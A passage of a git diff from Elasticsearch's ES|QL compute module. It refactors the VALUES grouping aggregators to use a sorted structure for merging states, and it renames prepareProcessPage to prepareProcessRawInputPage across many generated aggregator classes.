values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getInt(i)); + state.addValue(groupId, values.getInt(i)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - for (int id = 0; id < state.values.size(); id++) { - long both = state.values.get(id); - int group = (int) (both >>> Integer.SIZE); - if (group == statePosition) { - int value = (int) both; - combine(current, currentGroupId, value); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValue(currentGroupId, state.getValue(id)); } } @@ -117,6 +117,20 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -125,10 +139,15 @@ public void close() { * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; private final LongHash values; - private GroupingState(BigArrays bigArrays) { - values = new LongHash(1, bigArrays); + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); + values = new LongHash(1, driverContext.bigArrays()); } @Override @@ -136,6 +155,15 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValue(int groupId, int v) { + /* + * Encode the groupId and value into a single long - + * the top 32 bits for the group, the bottom 32 for the value. + */ + values.add((((long) groupId) << Integer.SIZE) | (v & 0xFFFFFFFFL)); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -145,8 +173,15 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -223,10 +258,23 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } + } + } + + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + } } + return sortedForOrdinalMerging; } Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { @@ -241,11 +289,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]); + case 1 -> builder.appendInt(getValue(ids[start])); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]); + builder.appendInt(getValue(ids[i])); } builder.endPositionEntry(); } @@ -256,10 +304,9 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele } } - private void append(IntBlock.Builder builder, int id) { - long both = values.get(id); - int value = (int) both; - builder.appendInt(value); + int getValue(int valueId) { + long both = values.get(valueId); + return (int) both; } @Override @@ -269,7 +316,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesLongAggregator.java b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesLongAggregator.java index 4bfc230d7e1f7..2790a182d5041 100644 --- a/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesLongAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/generated-src/org/elasticsearch/compute/aggregation/ValuesLongAggregator.java @@ -19,6 +19,8 @@ import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; /** * Aggregates field values for long. @@ -48,28 +50,32 @@ public static Block evaluateFinal(SingleState state, DriverContext driverContext return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } public static void combine(GroupingState state, int groupId, long v) { - state.values.add(groupId, v); + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, LongBlock values, int valuesPosition) { int start = values.getFirstValueIndex(valuesPosition); int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { - combine(state, groupId, values.getLong(i)); + state.addValue(groupId, values.getLong(i)); } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { - for (int id = 0; id < state.values.size(); id++) { - if (state.values.getKey1(id) == statePosition) { - long value = state.values.getKey2(id); - combine(current, currentGroupId, value); - } + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; + current.addValue(currentGroupId, state.getValue(id)); } } @@ -112,6 +118,20 @@ public void close() { } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -120,10 +140,15 @@ public void close() { * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; private final LongLongHash values; - private GroupingState(BigArrays bigArrays) { - values = new LongLongHash(1, bigArrays); + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); + values = new LongLongHash(1, driverContext.bigArrays()); } @Override @@ -131,6 +156,11 @@ public void toIntermediate(Block[] blocks, int offset, IntVector selected, Drive blocks[offset] = toBlock(driverContext.blockFactory(), selected); } + void addValue(int groupId, long v) { + values.add(groupId, v); + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -140,8 +170,15 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -216,12 +253,25 @@ Block toBlock(BlockFactory blockFactory, IntVector selected) { ids[selectedCounts[group]++] = id; } } - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } } } + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); + } + } + return sortedForOrdinalMerging; + } + Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { /* * Insert the ids in order. @@ -234,11 +284,11 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]); + case 1 -> builder.appendLong(getValue(ids[start])); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]); + builder.appendLong(getValue(ids[i])); } builder.endPositionEntry(); } @@ -249,9 +299,8 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele } } - private void append(LongBlock.Builder builder, int id) { - long value = values.getKey2(id); - builder.appendLong(value); + long getValue(int valueId) { + return values.getKey2(valueId); } @Override @@ -261,7 +310,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java index 4fce90e84add6..adb17dc433682 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java @@ -56,7 +56,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BooleanBlock valuesBlock = page.getBlock(channels.get(0)); BooleanVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java index 2d005a17dd182..77c2085b80353 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctDoubleGroupingAggregatorFunction.java index 0f0dfd4fa5b2c..5728e8051de9f 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctDoubleGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctFloatGroupingAggregatorFunction.java index 8e2fa1d71419a..a32c325b906de 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctFloatGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctIntGroupingAggregatorFunction.java index 08768acfa5261..24e5176e41432 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctIntGroupingAggregatorFunction.java @@ -60,7 +60,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctLongGroupingAggregatorFunction.java index 0b1caa1c3727c..0685f1fc0fee8 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctLongGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeDoubleGroupingAggregatorFunction.java index c0e299d57f6bb..4995a23d01140 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeDoubleGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeFloatGroupingAggregatorFunction.java index df4b6c843ff75..9e59f0145a3b1 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeFloatGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeIntGroupingAggregatorFunction.java index d0252f8b420d0..eedfd0800fd49 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeIntGroupingAggregatorFunction.java @@ -57,7 +57,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeLongGroupingAggregatorFunction.java index 8506d1e8d527b..97e89e741f699 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeLongGroupingAggregatorFunction.java @@ -56,7 +56,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeDoubleGroupingAggregatorFunction.java index 8a32e5552dd1c..313252268ca4f 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeDoubleGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeFloatGroupingAggregatorFunction.java index 250c5cd755a12..d6058e8e79189 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeFloatGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeIntGroupingAggregatorFunction.java index 9b118c7dea9be..effbf31e5ed1d 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeIntGroupingAggregatorFunction.java @@ -57,7 +57,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeLongGroupingAggregatorFunction.java index 82bfc732969e5..a3b8fbbe8dc69 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeLongGroupingAggregatorFunction.java @@ -56,7 +56,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBooleanGroupingAggregatorFunction.java index f7390f55bc52b..63b24da3e0e94 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBooleanGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBooleanGroupingAggregatorFunction.java @@ -56,7 +56,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BooleanBlock valuesBlock = page.getBlock(channels.get(0)); BooleanVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBytesRefGroupingAggregatorFunction.java index 41f98d962bd2f..d29b1cef6b8f8 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBytesRefGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBytesRefGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxDoubleGroupingAggregatorFunction.java index 53273dad7c0f0..e140de51e801a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxDoubleGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxFloatGroupingAggregatorFunction.java index 49afaf3c7265d..cc89041be61ba 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxFloatGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIntGroupingAggregatorFunction.java index 3d97bf9df5dd9..0c8e6dfe8e090 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIntGroupingAggregatorFunction.java @@ -57,7 +57,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIpGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIpGroupingAggregatorFunction.java index fd38873655edd..4253fcbc1654d 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIpGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIpGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxLongGroupingAggregatorFunction.java index fcaea869f84d4..0c7d88e50755b 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxLongGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationDoubleGroupingAggregatorFunction.java index c380146094f44..c8a9e737bd63a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationDoubleGroupingAggregatorFunction.java @@ -58,7 +58,7 @@ public int 